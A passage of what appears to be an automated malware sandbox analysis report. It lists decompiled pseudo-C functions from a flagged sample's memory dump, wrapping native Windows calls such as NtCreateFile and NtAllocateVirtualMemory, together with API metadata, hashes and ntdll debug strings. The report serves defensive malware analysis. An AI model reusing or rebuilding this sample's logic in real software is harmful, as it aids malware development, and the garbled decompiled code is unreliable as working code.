                                            						return _v16;
                                            					}
                                            					return _t18;
                                            				} else {
                                            					return _t15;
                                            				}
                                            			}














                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00419F40(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                            				long _t21;
                                            				void* _t31;
                                            
                                            				_t3 = _a4 + 0xc40; // 0xc40
                                            				E0041AB40(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                            				return _t21;
                                            			}






                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F8D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A120(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                            				long _t14;
                                            				void* _t21;
                                            
                                            				_t3 = _a4 + 0xc60; // 0xca0
                                            				E0041AB40(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                            				return _t14;
                                            			}






                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD14,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A159
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0041A06B(void* __eax, void* __ebx, void* __edx, void* _a4) {
                                            				intOrPtr _v0;
                                            				long _t11;
                                            				void* _t17;
                                            
                                            				_push(ds);
                                            				asm("enter 0x8b55, 0xec");
                                            				_t8 = _v0;
                                            				_t3 = _t8 + 0x10; // 0x300
                                            				_t4 = _t8 + 0xc50; // 0x40a923
                                            				E0041AB40(_t17, _v0, _t4,  *_t3, 0, 0x2c);
                                            				_t11 = NtClose(_a4); // executed
                                            				return _t11;
                                            			}







                                            APIs
                                            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A095
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A070(intOrPtr _a4, void* _a8) {
                                            				long _t8;
                                            				void* _t11;
                                            
                                            				_t5 = _a4;
                                            				_t2 = _t5 + 0x10; // 0x300
                                            				_t3 = _t5 + 0xc50; // 0x40a923
                                            				E0041AB40(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                            				_t8 = NtClose(_a8); // executed
                                            				return _t8;
                                            			}






                                            APIs
                                            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A095
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E00408373(void* __eax, signed int __ebx, int __ecx, signed int __edx, int _a8, long _a12, int _a16) {
                                            				intOrPtr _v4;
                                            				int _v8;
                                            				intOrPtr _v16;
                                            				int _v132;
                                            				int _v136;
                                            				char _v656;
                                            				int _v668;
                                            				char _v688;
                                            				char _v692;
                                            				intOrPtr _v696;
                                            				intOrPtr __edi;
                                            				int __esi;
                                            				void* __ebp;
                                            				int _t63;
                                            				long _t73;
                                            				intOrPtr* _t75;
                                            				void* _t77;
                                            
                                            				asm("in al, 0xd3");
                                            				asm("sti");
                                            				_push(ss);
                                            				asm("sti");
                                            				asm("popfd");
                                            				asm("stc");
                                            				_t63 = __ecx;
                                            				if((__edx & __ebx) != 0) {
                                            					 *((intOrPtr*)(__ebx + 0x30c483f0)) =  *((intOrPtr*)(__ebx + 0x30c483f0)) + __eax;
                                            					if(_t75 != 0) {
                                            						_t73 = _a12;
                                            						_t63 = PostThreadMessageW(_t73, 0x111, 0, 0); // executed
                                            						_t84 = _t63;
                                            						if(_t63 == 0) {
                                            							_t63 =  *_t75(_t73, 0x8003, _t77 + (E0040A460(_t84, 1, 8) & 0x000000ff) - 0x40, _t63);
                                            						}
                                            					}
                                            					return _t63;
                                            				} else {
                                            					_push(0x81ec8b55);
                                            					_push(__ebp);
                                            					__ebp = __esp;
                                            					__esp = __esp - 0x2ac;
                                            					_push(__ebx);
                                            					_push(__esi);
                                            					_push(__edi);
                                            					__eax = 0;
                                            					_v16 = 0;
                                            					_v696 = 0;
                                            					 &_v692 = E0041BA40( &_v692, 0, 0x2a4);
                                            					__esi = _a8;
                                            					__ecx =  *((intOrPtr*)(__esi + 0x300));
                                            					__edi = _v4;
                                            					__eax = E004082F0(__ebx, __eflags, _v4,  *((intOrPtr*)(__esi + 0x300))); // executed
                                            					__eax = E0041B330(__ecx);
                                            					_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                                            					__ebx = __eax + _t15;
                                            					_a8 = 0;
                                            					while(1) {
                                            						__eax = E0040F640(__edi, 0xfe363c80); // executed
                                            						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                            						__eax =  &_v688;
                                            						__eax = E0041A0E0(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
                                            						 *(__esi + 0x2dc) = __eax;
                                            						__eflags = __eax;
                                            						if(__eax < 0) {
                                            							break;
                                            						}
                                            						__eflags = _v656;
                                            						if(_v656 == 0) {
                                            							L13:
                                            							__eax = _a16;
                                            							__eax = _a16 + 1;
                                            							_a16 = __eax;
                                            							__eflags = __eax - 2;
                                            							if(__eax < 2) {
                                            								continue;
                                            							} else {
                                            								__ebx = _v8;
                                            								goto L17;
                                            							}
                                            						} else {
                                            							__eflags = _v668;
                                            							if(_v668 == 0) {
                                            								goto L13;
                                            							} else {
                                            								__eflags = _v136;
                                            								if(_v136 == 0) {
                                            									goto L13;
                                            								} else {
                                            									__eflags = _v132;
                                            									if(_v132 != 0) {
                                            										__eax = _a12;
                                            										__edx =  &_v688;
                                            										__ebx = 1;
                                            										__eax = E0041B9C0(_a12,  &_v688, 0x2a8);
                                            										L17:
                                            										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                            										__eax = E0041A070(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
                                            										__eflags = __ebx;
                                            										if(__ebx == 0) {
                                            											break;
                                            										} else {
                                            											__edx = _v668;
                                            											__eax = _a12;
                                            											__ecx = _v136;
                                            											 *(_a12 + 0x14) = _v668;
                                            											__edx =  *(__esi + 0x2d0);
                                            											_t35 = __esi + 0x2e8; // 0x2e8
                                            											__eax = _t35;
                                            											 *_t35 = _v136;
                                            											__eax = _a12;
                                            											_t37 = __esi + 0x314; // 0x314
                                            											__ebx = _t37;
                                            											__ecx = 0;
                                            											__eax = _a12 + 0x220;
                                            											 *__ebx = 0x18;
                                            											 *((intOrPtr*)(__esi + 0x318)) = 0;
                                            											 *((intOrPtr*)(__esi + 0x320)) = 0;
                                            											 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                            											 *((intOrPtr*)(__esi + 0x324)) = 0;
                                            											 *((intOrPtr*)(__esi + 0x328)) = 0;
                                            											__eax = E004198F0(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
                                            											__ecx = 0;
                                            											 *(__esi + 0x2dc) = __eax;
                                            											__eflags = __eax;
                                            											if(__eax < 0) {
                                            												break;
                                            											} else {
                                            												__edx = _v132;
                                            												_t45 = __esi + 0x2e0; // 0x2e0
                                            												__eax = _t45;
                                            												 *((intOrPtr*)(__esi + 0x318)) = 0;
                                            												 *((intOrPtr*)(__esi + 0x320)) = 0;
                                            												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                            												 *((intOrPtr*)(__esi + 0x324)) = 0;
                                            												 *((intOrPtr*)(__esi + 0x328)) = 0;
                                            												_a12 = _a12 + 0x224;
                                            												 *(__esi + 0x2e4) = _v132;
                                            												 *__ebx = 0x18;
                                            												 *(__esi + 0x2d0) = 0x1a;
                                            												__eax = E00419930(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
                                            												 *(__esi + 0x2dc) = __eax;
                                            												__eflags = __eax;
                                            												if(__eax < 0) {
                                            													break;
                                            												} else {
                                            													__edx = _a8;
                                            													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
                                            													__eflags =  *(__edx + 0x10) + 0x200;
                                            													__eax = E0041AFD0(__ecx);
                                            													__ebx = __eax;
                                            													__eax =  *(__ebx + 0x28);
                                            													__eax = E0041BCB0( *(__ebx + 0x28));
                                            													__edx =  *(__ebx + 0x28);
                                            													_t60 = __eax + 2; // 0x2
                                            													__ecx = __eax + _t60;
                                            													__eax =  &_v656;
                                            													__eax = E00414A20(__edi,  &_v656, 2, 0); // executed
                                            													_pop(__edi);
                                            													_pop(__esi);
                                            													_pop(__ebx);
                                            													__esp = __ebp;
                                            													_pop(__ebp);
                                            													return __eax;
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										goto L13;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L21;
                                            					}
                                            					_pop(__edi);
                                            					_pop(__esi);
                                            					__eax = 0;
                                            					__eflags = 0;
                                            					_pop(__ebx);
                                            					__esp = __ebp;
                                            					_pop(__ebp);
                                            					return 0;
                                            				}
                                            				L21:
                                            			}




















                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: ea74b5f1fd3e60aeaee44504f2f3402baf2d0c783d6e2a6d92c0f31b61d5a3c9
                                            • Instruction ID: 5be320684be982dd5be809bf41a30e5aca975f799b987cf45196c374d2def9b4
                                            • Opcode Fuzzy Hash: ea74b5f1fd3e60aeaee44504f2f3402baf2d0c783d6e2a6d92c0f31b61d5a3c9
                                            • Instruction Fuzzy Hash: E661C4B0600309AFDB25DF64DD85BEB77E8EF48704F00446EF949A7281DB74A941CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
                                            				char _v67;
                                            				char _v68;
                                            				void* _t14;
                                            				void* _t15;
                                            				int _t16;
                                            				char* _t20;
                                            				long _t24;
                                            				intOrPtr _t26;
                                            				intOrPtr* _t27;
                                            				void* _t28;
                                            
                                            				_v68 = 0;
                                            				E0041BA40( &_v67, 0, 0x3f);
                                            				_t20 =  &_v68;
                                            				E0041C5E0(_t20, 3);
                                            				_t26 = _a4;
                                            				_t27 = _t26 + 0x1c;
                                            				_t14 = E0040ACD0(_t27, _t27,  &_v68); // executed
                                            				_t15 = E00414E20(_t27, _t14, 0, 0, 0xc4e7b6d6);
                                            				 *((intOrPtr*)(__ebx + 0x30c483f0)) =  *((intOrPtr*)(__ebx + 0x30c483f0)) + _t20;
                                            				if(_t27 != 0) {
                                            					_t24 = _a8;
                                            					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                                            					_t34 = _t16;
                                            					if(_t16 == 0) {
                                            						_t16 =  *_t27(_t24, 0x8003, _t28 + (E0040A460(_t34, 1, 8) & 0x000000ff) - 0x40, _t16);
                                            					}
                                            					return _t16;
                                            				}
                                            				return _t15;
                                            			}













                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 5979eb0b3e4b2f2f99457796a9d187242cc49815797ce951ec76352a9c0a08f3
                                            • Instruction ID: 9bf814525d72d383b6bb443767b854bd285969e766b1df84f5265e4e126c9636
                                            • Opcode Fuzzy Hash: 5979eb0b3e4b2f2f99457796a9d187242cc49815797ce951ec76352a9c0a08f3
                                            • Instruction Fuzzy Hash: 2A01F731A803287BE720A6A59C03FFF772CAB40F54F04401EFF04BA1C1E6A8690546FA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 63%
                                            			E004082B7(void* __eax, void* __ebx, void* __ecx) {
                                            				void* _t10;
                                            				int _t11;
                                            				void* _t14;
                                            				long _t22;
                                            				void* _t24;
                                            				int _t25;
                                            				void* _t29;
                                            
                                            				_t18 = __ecx;
                                            				asm("in eax, dx");
                                            				if(__eax < 0x840527af) {
                                            					_t25 = _t24 + 0x1c;
                                            					__eflags = _t25;
                                            					_t10 = E0040ACD0(_t25, _t25, _t29 - 0x40); // executed
                                            					_t11 = E00414E20(_t25, _t10, 0, 0, 0xc4e7b6d6);
                                            					 *((intOrPtr*)(__ebx + 0x30c483f0)) =  *((intOrPtr*)(__ebx + 0x30c483f0)) + _t18;
                                            					__eflags = _t25;
                                            					if(_t25 != 0) {
                                            						_t22 =  *(_t29 + 0xc);
                                            						_t11 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                            						__eflags = _t11;
                                            						if(__eflags == 0) {
                                            							_t11 =  *_t25(_t22, 0x8003, _t29 + (E0040A460(__eflags, 1, 8) & 0x000000ff) - 0x40, _t11);
                                            						}
                                            					}
                                            					return _t11;
                                            				} else {
                                            					asm("aas");
                                            					_push(_t24);
                                            					_t14 = E0041B480(__eax, __ecx, 0x11c6f95e);
                                            					return E0041B330(__ecx) + _t14 + 0x1000;
                                            				}
                                            			}










                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 7f1dd0263c1def1852f355abbc76d8bd90c83712246cbe1db27db23784762e83
                                            • Instruction ID: 9486c3d5ee46871ace2dafdc9ba76dc75e767ca03e3c9aac055c4243c91e1922
                                            • Opcode Fuzzy Hash: 7f1dd0263c1def1852f355abbc76d8bd90c83712246cbe1db27db23784762e83
                                            • Instruction Fuzzy Hash: 48F0E931A8062436E62056945D43FBF625CABD0F15F15412EFF04F91C1EAFE691506FA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A23D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 2d9257fdf52b05ac94278bad8b9fd4730d1b4eca5e51c309faf3fe2ee8b3a849
                                            • Instruction ID: 4a4bb32f82f9b1e629d90a22692f075a238e95243f20a4eed88629fcf5407140
                                            • Opcode Fuzzy Hash: 2d9257fdf52b05ac94278bad8b9fd4730d1b4eca5e51c309faf3fe2ee8b3a849
                                            • Instruction Fuzzy Hash: 72F027726002146FD724EFD4DC85EE7B7A9EF89310F1045AAFA4C9B301C531A950CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A250(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                            				char _t10;
                                            				void* _t15;
                                            
                                            				_t3 = _a4 + 0xc74; // 0xc74
                                            				E0041AB40(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}





                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A27D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: ee3aa041e972e1580d2f30967c3c9a2bcee9683d3d67cd51b15d6bd94af8f81d
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: BEE046B1200208ABDB18EF99CC49EE777ADEF88760F018559FE095B242C630F910CAF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 36%
                                            			E0041A210(intOrPtr _a4, void* _a8, signed char _a12, void* _a16) {
                                            				void* _v5;
                                            				signed char _t9;
                                            				void* _t11;
                                            				void* _t13;
                                            				void* _t16;
                                            
                                            				E0041AB40(_t16, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                            				_t9 = _a12;
                                            				_t13 = _a8;
                                            				asm("les edx, [edx+edx*2]");
                                            				_push(_t9 | 0x00000083);
                                            				_t11 = RtlAllocateHeap(_t13); // executed
                                            				return _t11;
                                            			}








                                            APIs
                                            • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A23D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 447e7a220df12b1cedfda995ac5eefb5f8fdfd8f8e9865071670fb4112bd08d3
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: F8E012B1200208ABDB14EF99CC41EA777ADAF88664F118559BA095B242C630F9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A3B0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                            				int _t10;
                                            				void* _t15;
                                            
                                            				E0041AB40(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}






                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3E0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 59391c5e11f167e5dbe23f0656a9380a297fcfa3b65dd95ded7aab8eafd70cc2
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: E3E01AB12002086BDB10DF49CC85EE777ADAF88650F018155BA0957241C934F8108BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A290(intOrPtr _a4, int _a8) {
                                            				void* _t10;
                                            
                                            				_t5 = _a4;
                                            				E0041AB40(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                            				ExitProcess(_a8);
                                            			}





                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2B8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 0f5b6569f0fd1189fef647496f38c461ee85f3cd89d543d30868c9d99a5dee31
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: A5D017726042187BD620EB99CC85FD777ACDF487A0F0180A9BA1D6B242C535BA108AE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E0041A283(intOrPtr _a4, int _a8) {
                                            				signed int _t13;
                                            				signed int _t14;
                                            				void* _t24;
                                            
                                            				_t14 = _t13 *  *(_t24 + 0x3a5fbefd);
                                            				gs =  *((intOrPtr*)(_t14 - 0x66));
                                            				asm("clc");
                                            				_t15 = _a4;
                                            				E0041AB40(_t24, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t15 + 0xa14)), 0, 0x36);
                                            				ExitProcess(_a8);
                                            			}







                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2B8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 75b89fe0f6615cbc7119c717c7462a35c62d4160543aaf409624732c35e49f26
                                            • Instruction ID: 2f9972bc5181711e0f925a6db8f1358e8404c48fe773edb9fb5b66106bbd618e
                                            • Opcode Fuzzy Hash: 75b89fe0f6615cbc7119c717c7462a35c62d4160543aaf409624732c35e49f26
                                            • Instruction Fuzzy Hash: CFE08C71210300BBC621DB59CC99FD77BA8AF09760F018498BA591B642D275BB10CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
                                            • Instruction ID: 243ba033f1fa935ed16f2785cc48698f715f6da06f3a2df43106aa4054c7ab8c
                                            • Opcode Fuzzy Hash: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
                                            • Instruction Fuzzy Hash: 9BB09B719114D5C9D651D7A4460C7177A4477D4745F56C061D1420641B4778C095F6B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Strings
                                            • read from, xrefs: 0109B4AD, 0109B4B2
                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0109B2F3
                                            • The instruction at %p tried to %s , xrefs: 0109B4B6
                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B3D6
                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B38F
                                            • *** enter .exr %p for the exception record, xrefs: 0109B4F1
                                            • The critical section is owned by thread %p., xrefs: 0109B3B9
                                            • *** enter .cxr %p for the context, xrefs: 0109B50D
                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0109B47D
                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0109B305
                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0109B484
                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0109B2DC
                                            • The instruction at %p referenced memory at %p., xrefs: 0109B432
                                            • *** Inpage error in %ws:%s, xrefs: 0109B418
                                            • write to, xrefs: 0109B4A6
                                            • This failed because of error %Ix., xrefs: 0109B446
                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0109B53F
                                            • <unknown>, xrefs: 0109B27E, 0109B2D1, 0109B350, 0109B399, 0109B417, 0109B48E
                                            • a NULL pointer, xrefs: 0109B4E0
                                            • The resource is owned shared by %d threads, xrefs: 0109B37E
                                            • an invalid address, %p, xrefs: 0109B4CF
                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0109B39B
                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0109B323
                                            • Go determine why that thread has not released the critical section., xrefs: 0109B3C5
                                            • *** then kb to get the faulting stack, xrefs: 0109B51C
                                            • The resource is owned exclusively by thread %p, xrefs: 0109B374
                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0109B476
                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0109B314
                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0109B48F
                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0109B352
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                            • API String ID: 0-108210295
                                            • Opcode ID: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
                                            • Instruction ID: 456981eda588d109beb15d67dbb1126519e2c845e8440bd8a6eff6dae8def42e
                                            • Opcode Fuzzy Hash: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
                                            • Instruction Fuzzy Hash: 40810375A40200FFDF21AB09AC95EAF3B76FF56B62F498085F5841B252D761C401FAB2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E010A1C06() {
                                            				signed int _t27;
                                            				char* _t104;
                                            				char* _t105;
                                            				intOrPtr _t113;
                                            				intOrPtr _t115;
                                            				intOrPtr _t117;
                                            				intOrPtr _t119;
                                            				intOrPtr _t120;
                                            
                                            				_t105 = 0xfc48a4;
                                            				_t104 = "HEAP: ";
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
